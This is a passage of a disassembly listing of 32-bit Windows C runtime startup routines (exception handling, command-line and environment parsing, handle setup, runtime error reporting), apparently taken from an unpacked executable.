and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41D0E1
loc_41D0EA: ; CODE XREF: sub_41D06A+69�j
mov eax, [eax]
mov esi, dword_43612C
cmp eax, 0C000008Eh
jnz short loc_41D105
mov dword_43612C, 83h
jmp short loc_41D175
; ---------------------------------------------------------------------------
loc_41D105: ; CODE XREF: sub_41D06A+8D�j
cmp eax, 0C0000090h
jnz short loc_41D118
mov dword_43612C, 81h
jmp short loc_41D175
; ---------------------------------------------------------------------------
loc_41D118: ; CODE XREF: sub_41D06A+A0�j
cmp eax, 0C0000091h
jnz short loc_41D12B
mov dword_43612C, 84h
jmp short loc_41D175
; ---------------------------------------------------------------------------
loc_41D12B: ; CODE XREF: sub_41D06A+B3�j
cmp eax, 0C0000093h
jnz short loc_41D13E
mov dword_43612C, 85h
jmp short loc_41D175
; ---------------------------------------------------------------------------
loc_41D13E: ; CODE XREF: sub_41D06A+C6�j
cmp eax, 0C000008Dh
jnz short loc_41D151
mov dword_43612C, 82h
jmp short loc_41D175
; ---------------------------------------------------------------------------
loc_41D151: ; CODE XREF: sub_41D06A+D9�j
cmp eax, 0C000008Fh
jnz short loc_41D164
mov dword_43612C, 86h
jmp short loc_41D175
; ---------------------------------------------------------------------------
loc_41D164: ; CODE XREF: sub_41D06A+EC�j
cmp eax, 0C0000092h
jnz short loc_41D175
mov dword_43612C, 8Ah
loc_41D175: ; CODE XREF: sub_41D06A+99�j
; sub_41D06A+AC�j ...
push dword_43612C
push 8
call ebx
pop ecx
mov dword_43612C, esi
pop ecx
pop esi
jmp short loc_41D192
; ---------------------------------------------------------------------------
loc_41D18A: ; CODE XREF: sub_41D06A+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41D192: ; CODE XREF: sub_41D06A+11E�j
mov eax, [ebp+arg_0]
mov dword_4928A4, eax
loc_41D19A: ; CODE XREF: sub_41D06A+34�j
or eax, 0FFFFFFFFh
jmp short loc_41D1A8
; ---------------------------------------------------------------------------
loc_41D19F: ; CODE XREF: sub_41D06A+F�j
; sub_41D06A+1A�j
push [ebp+arg_4]
call ds:dword_49547C ; UnhandledExceptionFilter
loc_41D1A8: ; CODE XREF: sub_41D06A+2C�j
; sub_41D06A+133�j
pop ebx
pop ebp
retn
sub_41D06A endp
; =============== S U B R O U T I N E =======================================
sub_41D1AB proc near ; CODE XREF: sub_41D06A+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_436128
cmp dword_4360A8, edx
push esi
mov eax, offset dword_4360A8
jz short loc_41D1D8
lea esi, [ecx+ecx*2]
lea esi, ds:4360A8h[esi*4]
loc_41D1CD: ; CODE XREF: sub_41D1AB+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41D1D8
cmp [eax], edx
jnz short loc_41D1CD
loc_41D1D8: ; CODE XREF: sub_41D1AB+16�j
; sub_41D1AB+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:4360A8h[ecx*4]
cmp eax, ecx
jnb short loc_41D1EB
cmp [eax], edx
jz short locret_41D1ED
loc_41D1EB: ; CODE XREF: sub_41D1AB+3A�j
xor eax, eax
locret_41D1ED: ; CODE XREF: sub_41D1AB+3E�j
retn
sub_41D1AB endp
; =============== S U B R O U T I N E =======================================
sub_41D1EE proc near ; CODE XREF: sub_417ED0+A5�p
cmp dword_494294, 0
jnz short loc_41D1FC
call sub_41CAB9
loc_41D1FC: ; CODE XREF: sub_41D1EE+7�j
push esi
mov esi, dword_494278
mov al, [esi]
cmp al, 22h
jnz short loc_41D22E
loc_41D209: ; CODE XREF: sub_41D1EE+33�j
; sub_41D1EE+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41D226
test al, al
jz short loc_41D226
movzx eax, al
push eax
call sub_41F790
test eax, eax
pop ecx
jz short loc_41D209
inc esi
jmp short loc_41D209
; ---------------------------------------------------------------------------
loc_41D226: ; CODE XREF: sub_41D1EE+21�j
; sub_41D1EE+25�j
cmp byte ptr [esi], 22h
jnz short loc_41D238
loc_41D22B: ; CODE XREF: sub_41D1EE+52�j
inc esi
jmp short loc_41D238
; ---------------------------------------------------------------------------
loc_41D22E: ; CODE XREF: sub_41D1EE+19�j
cmp al, 20h
jbe short loc_41D238
loc_41D232: ; CODE XREF: sub_41D1EE+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41D232
loc_41D238: ; CODE XREF: sub_41D1EE+3B�j
; sub_41D1EE+3E�j ...
mov al, [esi]
test al, al
jz short loc_41D242
cmp al, 20h
jbe short loc_41D22B
loc_41D242: ; CODE XREF: sub_41D1EE+4E�j
mov eax, esi
pop esi
retn
sub_41D1EE endp
; =============== S U B R O U T I N E =======================================
sub_41D246 proc near ; CODE XREF: sub_417ED0+8E�p
push ebx
xor ebx, ebx
cmp dword_494294, ebx
push esi
push edi
jnz short loc_41D258
call sub_41CAB9
loc_41D258: ; CODE XREF: sub_41D246+B�j
mov esi, dword_492840
xor edi, edi
loc_41D260: ; CODE XREF: sub_41D246+30�j
mov al, [esi]
cmp al, bl
jz short loc_41D278
cmp al, 3Dh
jz short loc_41D26B
inc edi
loc_41D26B: ; CODE XREF: sub_41D246+22�j
push esi
call sub_4158E0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41D260
; ---------------------------------------------------------------------------
loc_41D278: ; CODE XREF: sub_41D246+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_415CF8
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_49281C, esi
jnz short loc_41D29A
push 9
call sub_417FC6
pop ecx
loc_41D29A: ; CODE XREF: sub_41D246+4A�j
mov edi, dword_492840
cmp [edi], bl
jz short loc_41D2DD
push ebp
loc_41D2A5: ; CODE XREF: sub_41D246+94�j
push edi
call sub_4158E0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41D2D6
push ebp
call sub_415CF8
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41D2C9
push 9
call sub_417FC6
pop ecx
loc_41D2C9: ; CODE XREF: sub_41D246+79�j
push edi
push dword ptr [esi]
call sub_4175D0
pop ecx
add esi, 4
pop ecx
loc_41D2D6: ; CODE XREF: sub_41D246+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_41D2A5
pop ebp
loc_41D2DD: ; CODE XREF: sub_41D246+5C�j
push dword_492840
call sub_415D6C
pop ecx
mov dword_492840, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_494284, 1
pop ebx
retn
sub_41D246 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2FF proc near ; CODE XREF: sub_417ED0+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_494294, ebx
push esi
push edi
jnz short loc_41D316
call sub_41CAB9
loc_41D316: ; CODE XREF: sub_41D2FF+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:dword_495330 ; GetModuleFileNameA
mov eax, dword_494278
mov off_49282C, esi
mov edi, esi
cmp [eax], bl
jz short loc_41D33B
mov edi, eax
loc_41D33B: ; CODE XREF: sub_41D2FF+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_41D398
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_415CF8
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41D36B
push 8
call sub_417FC6
pop ecx
loc_41D36B: ; CODE XREF: sub_41D2FF+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41D398
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_492814, esi
pop edi
pop esi
mov dword_492810, eax
pop ebx
leave
retn
sub_41D2FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D398 proc near ; CODE XREF: sub_41D2FF+47�p
; sub_41D2FF+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41D3C2
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41D3C2: ; CODE XREF: sub_41D398+20�j
cmp byte ptr [eax], 22h
jnz short loc_41D40B
loc_41D3C7: ; CODE XREF: sub_41D398+58�j
; sub_41D398+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41D3F9
test dl, dl
jz short loc_41D3F9
movzx edx, dl
test byte_494141[edx], 4
jz short loc_41D3EC
inc dword ptr [ecx]
test esi, esi
jz short loc_41D3EC
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41D3EC: ; CODE XREF: sub_41D398+46�j
; sub_41D398+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D3C7
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41D3C7
; ---------------------------------------------------------------------------
loc_41D3F9: ; CODE XREF: sub_41D398+36�j
; sub_41D398+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D403
and byte ptr [esi], 0
inc esi
loc_41D403: ; CODE XREF: sub_41D398+65�j
cmp byte ptr [eax], 22h
jnz short loc_41D44E
inc eax
jmp short loc_41D44E
; ---------------------------------------------------------------------------
loc_41D40B: ; CODE XREF: sub_41D398+2D�j
; sub_41D398+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D416
mov dl, [eax]
mov [esi], dl
inc esi
loc_41D416: ; CODE XREF: sub_41D398+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_494141[ebx], 4
jz short loc_41D431
inc dword ptr [ecx]
test esi, esi
jz short loc_41D430
mov bl, [eax]
mov [esi], bl
inc esi
loc_41D430: ; CODE XREF: sub_41D398+91�j
inc eax
loc_41D431: ; CODE XREF: sub_41D398+8B�j
cmp dl, 20h
jz short loc_41D43F
test dl, dl
jz short loc_41D443
cmp dl, 9
jnz short loc_41D40B
loc_41D43F: ; CODE XREF: sub_41D398+9C�j
test dl, dl
jnz short loc_41D446
loc_41D443: ; CODE XREF: sub_41D398+A0�j
dec eax
jmp short loc_41D44E
; ---------------------------------------------------------------------------
loc_41D446: ; CODE XREF: sub_41D398+A9�j
test esi, esi
jz short loc_41D44E
and byte ptr [esi-1], 0
loc_41D44E: ; CODE XREF: sub_41D398+6E�j
; sub_41D398+71�j ...
and [ebp+arg_10], 0
loc_41D452: ; CODE XREF: sub_41D398+19E�j
cmp byte ptr [eax], 0
jz loc_41D53B
loc_41D45B: ; CODE XREF: sub_41D398+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41D467
cmp dl, 9
jnz short loc_41D46A
loc_41D467: ; CODE XREF: sub_41D398+C8�j
inc eax
jmp short loc_41D45B
; ---------------------------------------------------------------------------
loc_41D46A: ; CODE XREF: sub_41D398+CD�j
cmp byte ptr [eax], 0
jz loc_41D53B
test edi, edi
jz short loc_41D47F
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41D47F: ; CODE XREF: sub_41D398+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41D484: ; CODE XREF: sub_41D398+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41D48D: ; CODE XREF: sub_41D398+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41D496
inc eax
inc ebx
jmp short loc_41D48D
; ---------------------------------------------------------------------------
loc_41D496: ; CODE XREF: sub_41D398+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41D4C7
test bl, 1
jnz short loc_41D4C5
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41D4B4
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41D4B4
mov eax, edx
jmp short loc_41D4B7
; ---------------------------------------------------------------------------
loc_41D4B4: ; CODE XREF: sub_41D398+10D�j
; sub_41D398+116�j
mov [ebp+arg_0], edi
loc_41D4B7: ; CODE XREF: sub_41D398+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41D4C5: ; CODE XREF: sub_41D398+106�j
shr ebx, 1
loc_41D4C7: ; CODE XREF: sub_41D398+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41D4DC
inc ebx
loc_41D4CF: ; CODE XREF: sub_41D398+142�j
test esi, esi
jz short loc_41D4D7
mov byte ptr [esi], 5Ch
inc esi
loc_41D4D7: ; CODE XREF: sub_41D398+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41D4CF
loc_41D4DC: ; CODE XREF: sub_41D398+134�j
mov dl, [eax]
test dl, dl
jz short loc_41D52C
cmp [ebp+arg_10], 0
jnz short loc_41D4F2
cmp dl, 20h
jz short loc_41D52C
cmp dl, 9
jz short loc_41D52C
loc_41D4F2: ; CODE XREF: sub_41D398+14E�j
cmp [ebp+arg_0], 0
jz short loc_41D526
test esi, esi
jz short loc_41D515
movzx ebx, dl
test byte_494141[ebx], 4
jz short loc_41D50E
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_41D50E: ; CODE XREF: sub_41D398+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41D524
; ---------------------------------------------------------------------------
loc_41D515: ; CODE XREF: sub_41D398+162�j
movzx edx, dl
test byte_494141[edx], 4
jz short loc_41D524
inc eax
inc dword ptr [ecx]
loc_41D524: ; CODE XREF: sub_41D398+17B�j
; sub_41D398+187�j
inc dword ptr [ecx]
loc_41D526: ; CODE XREF: sub_41D398+15E�j
inc eax
jmp loc_41D484
; ---------------------------------------------------------------------------
loc_41D52C: ; CODE XREF: sub_41D398+148�j
; sub_41D398+153�j ...
test esi, esi
jz short loc_41D534
and byte ptr [esi], 0
inc esi
loc_41D534: ; CODE XREF: sub_41D398+196�j
inc dword ptr [ecx]
jmp loc_41D452
; ---------------------------------------------------------------------------
loc_41D53B: ; CODE XREF: sub_41D398+BD�j
; sub_41D398+D5�j
test edi, edi
jz short loc_41D542
and dword ptr [edi], 0
loc_41D542: ; CODE XREF: sub_41D398+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41D398 endp
; =============== S U B R O U T I N E =======================================
sub_41D54C proc near ; CODE XREF: sub_417ED0+7F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_4929AC
push ebx
push ebp
mov ebp, ds:dword_495320
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41D59A
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41D57B
mov dword_4929AC, 1
jmp short loc_41D5A3
; ---------------------------------------------------------------------------
loc_41D57B: ; CODE XREF: sub_41D54C+21�j
call ds:dword_495488 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_41D675
mov dword_4929AC, 2
jmp loc_41D629
; ---------------------------------------------------------------------------
loc_41D59A: ; CODE XREF: sub_41D54C+19�j
cmp eax, 1
jnz loc_41D624
loc_41D5A3: ; CODE XREF: sub_41D54C+2D�j
cmp esi, ebx
jnz short loc_41D5B3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41D675
loc_41D5B3: ; CODE XREF: sub_41D54C+59�j
cmp [esi], bx
mov eax, esi
jz short loc_41D5C8
loc_41D5BA: ; CODE XREF: sub_41D54C+73�j
; sub_41D54C+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41D5BA
inc eax
inc eax
cmp [eax], bx
jnz short loc_41D5BA
loc_41D5C8: ; CODE XREF: sub_41D54C+6C�j
sub eax, esi
mov edi, ds:dword_4953E8
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41D619
push ebp
call sub_415CF8
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41D619
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41D615
push [esp+18h+var_8]
call sub_415D6C
pop ecx
mov [esp+18h+var_8], ebx
loc_41D615: ; CODE XREF: sub_41D54C+B9�j
mov ebx, [esp+18h+var_8]
loc_41D619: ; CODE XREF: sub_41D54C+99�j
; sub_41D54C+A8�j
push esi
call ds:dword_495484 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41D677
; ---------------------------------------------------------------------------
loc_41D624: ; CODE XREF: sub_41D54C+51�j
cmp eax, 2
jnz short loc_41D675
loc_41D629: ; CODE XREF: sub_41D54C+49�j
cmp edi, ebx
jnz short loc_41D639
call ds:dword_495488 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_41D675
loc_41D639: ; CODE XREF: sub_41D54C+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_41D649
loc_41D63F: ; CODE XREF: sub_41D54C+F6�j
; sub_41D54C+FB�j
inc eax
cmp [eax], bl
jnz short loc_41D63F
inc eax
cmp [eax], bl
jnz short loc_41D63F
loc_41D649: ; CODE XREF: sub_41D54C+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_415CF8
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41D65F
xor esi, esi
jmp short loc_41D66A
; ---------------------------------------------------------------------------
loc_41D65F: ; CODE XREF: sub_41D54C+10D�j
push ebp
push edi
push esi
call sub_415960
add esp, 0Ch
loc_41D66A: ; CODE XREF: sub_41D54C+111�j
push edi
call ds:dword_495480 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_41D677
; ---------------------------------------------------------------------------
loc_41D675: ; CODE XREF: sub_41D54C+39�j
; sub_41D54C+61�j ...
xor eax, eax
loc_41D677: ; CODE XREF: sub_41D54C+D6�j
; sub_41D54C+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41D54C endp
; =============== S U B R O U T I N E =======================================
sub_41D67E proc near ; CODE XREF: sub_417ED0+6F�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_415CF8
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41D69E
push 1Bh
call sub_417FC6
pop ecx
loc_41D69E: ; CODE XREF: sub_41D67E+16�j
mov dword_493E60, esi
mov dword_493F9C, 20h
lea eax, [esi+100h]
loc_41D6B4: ; CODE XREF: sub_41D67E+52�j
cmp esi, eax
jnb short loc_41D6D2
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_493E60
add esi, 8
add eax, 100h
jmp short loc_41D6B4
; ---------------------------------------------------------------------------
loc_41D6D2: ; CODE XREF: sub_41D67E+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_495440 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_41D7AE
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_41D7AE
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41D708
mov esi, eax
loc_41D708: ; CODE XREF: sub_41D67E+86�j
cmp dword_493F9C, esi
jge short loc_41D762
mov edi, offset dword_493E64
loc_41D715: ; CODE XREF: sub_41D67E+DA�j
push 100h
call sub_415CF8
test eax, eax
pop ecx
jz short loc_41D75C
add dword_493F9C, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41D733: ; CODE XREF: sub_41D67E+CF�j
cmp eax, ecx
jnb short loc_41D74F
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41D733
; ---------------------------------------------------------------------------
loc_41D74F: ; CODE XREF: sub_41D67E+B7�j
add edi, 4
cmp dword_493F9C, esi
jl short loc_41D715
jmp short loc_41D762
; ---------------------------------------------------------------------------
loc_41D75C: ; CODE XREF: sub_41D67E+A4�j
mov esi, dword_493F9C
loc_41D762: ; CODE XREF: sub_41D67E+90�j
; sub_41D67E+DC�j
xor edi, edi
test esi, esi
jle short loc_41D7AE
loc_41D768: ; CODE XREF: sub_41D67E+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41D7A5
mov cl, [ebp+0]
test cl, 1
jz short loc_41D7A5
test cl, 8
jnz short loc_41D787
push eax
call ds:dword_495314 ; GetFileType
test eax, eax
jz short loc_41D7A5
loc_41D787: ; CODE XREF: sub_41D67E+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_493E60[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41D7A5: ; CODE XREF: sub_41D67E+EF�j
; sub_41D67E+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41D768
loc_41D7AE: ; CODE XREF: sub_41D67E+65�j
; sub_41D67E+71�j ...
xor ebx, ebx
loc_41D7B0: ; CODE XREF: sub_41D67E+195�j
mov eax, dword_493E60
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41D80B
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41D7CB
push 0FFFFFFF6h
pop eax
jmp short loc_41D7D5
; ---------------------------------------------------------------------------
loc_41D7CB: ; CODE XREF: sub_41D67E+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41D7D5: ; CODE XREF: sub_41D67E+14B�j
push eax
call ds:dword_495318 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41D7FA
push edi
call ds:dword_495314 ; GetFileType
test eax, eax
jz short loc_41D7FA
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41D800
loc_41D7FA: ; CODE XREF: sub_41D67E+163�j
; sub_41D67E+16E�j
or byte ptr [esi+4], 40h
jmp short loc_41D80F
; ---------------------------------------------------------------------------
loc_41D800: ; CODE XREF: sub_41D67E+17A�j
cmp eax, 3
jnz short loc_41D80F
or byte ptr [esi+4], 8
jmp short loc_41D80F
; ---------------------------------------------------------------------------
loc_41D80B: ; CODE XREF: sub_41D67E+13E�j
or byte ptr [esi+4], 80h
loc_41D80F: ; CODE XREF: sub_41D67E+180�j
; sub_41D67E+185�j ...
inc ebx
cmp ebx, 3
jl short loc_41D7B0
push dword_493F9C
call ds:dword_49531C ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_41D67E endp
; ---------------------------------------------------------------------------
push esi
mov esi, offset dword_493E60
loc_41D82F: ; CODE XREF: .text:0041D848�j
mov eax, [esi]
test eax, eax
jz short loc_41D83F
push eax
call sub_415D6C
and dword ptr [esi], 0
pop ecx
loc_41D83F: ; CODE XREF: .text:0041D833�j
add esi, 4
cmp esi, offset dword_493F60
jl short loc_41D82F
pop esi
retn
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D854 proc near ; DATA XREF: sub_417ED0+A�o
; sub_41A41C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41D8F4
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41D887: ; CODE XREF: sub_41D854+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41D8ED
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41D8DB
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41D8DB
js short loc_41D8E6
mov edi, [ebx+8]
push ebx
call sub_4162C8
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41630A
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_41639E
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41D8DB: ; CODE XREF: sub_41D854+40�j
; sub_41D854+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41D887
; ---------------------------------------------------------------------------
loc_41D8E6: ; CODE XREF: sub_41D854+54�j
mov eax, 0
jmp short loc_41D909
; ---------------------------------------------------------------------------
loc_41D8ED: ; CODE XREF: sub_41D854+36�j
mov eax, 1
jmp short loc_41D909
; ---------------------------------------------------------------------------
loc_41D8F4: ; CODE XREF: sub_41D854+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41630A
add esp, 8
pop ebp
mov eax, 1
loc_41D909: ; CODE XREF: sub_41D854+97�j
; sub_41D854+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D854 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41630A
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41D92C proc near ; CODE XREF: sub_417FC6+9�p
; sub_417FEB+9�p
mov eax, dword_492848
cmp eax, 1
jz short loc_41D943
test eax, eax
jnz short locret_41D964
cmp dword_435AA4, 1
jnz short locret_41D964
loc_41D943: ; CODE XREF: sub_41D92C+8�j
push 0FCh
call sub_41D965
mov eax, dword_4929B0
pop ecx
test eax, eax
jz short loc_41D959
call eax
loc_41D959: ; CODE XREF: sub_41D92C+29�j
push 0FFh
call sub_41D965
pop ecx
locret_41D964: ; CODE XREF: sub_41D92C+C�j
; sub_41D92C+15�j
retn
sub_41D92C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D965 proc near ; CODE XREF: sub_417FC6+12�p
; sub_417FEB+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_436138
loc_41D978: ; CODE XREF: sub_41D965+20�j
cmp edx, [eax]
jz short loc_41D987
add eax, 8
inc ecx
cmp eax, offset dword_4361C8
jl short loc_41D978
loc_41D987: ; CODE XREF: sub_41D965+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_436138[esi]
jnz loc_41DAB5
mov eax, dword_492848
cmp eax, 1
jz loc_41DA8F
test eax, eax
jnz short loc_41D9B8
cmp dword_435AA4, 1
jz loc_41DA8F
loc_41D9B8: ; CODE XREF: sub_41D965+44�j
cmp edx, 0FCh
jz loc_41DAB5
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:dword_495330 ; GetModuleFileNameA
test eax, eax
jnz short loc_41D9EF
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_4175D0
pop ecx
pop ecx
loc_41D9EF: ; CODE XREF: sub_41D965+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_4158E0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41DA32
lea eax, [ebp+var_1A4]
push eax
call sub_4158E0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_416A10
add esp, 10h
loc_41DA32: ; CODE XREF: sub_41D965+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_4175D0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_4175E0
lea eax, [ebp+var_A0]
push offset asc_427AF0 ; "\n\n"
push eax
call sub_4175E0
push off_43613C[esi]
lea eax, [ebp+var_A0]
push eax
call sub_4175E0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_41F80A
add esp, 2Ch
pop edi
jmp short loc_41DAB5
; ---------------------------------------------------------------------------
loc_41DA8F: ; CODE XREF: sub_41D965+3C�j
; sub_41D965+4D�j
lea eax, [ebp+arg_0]
lea esi, off_43613C[esi]
push 0
push eax
push dword ptr [esi]
call sub_4158E0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_495318 ; GetStdHandle
push eax
call ds:dword_49535C ; WriteFile
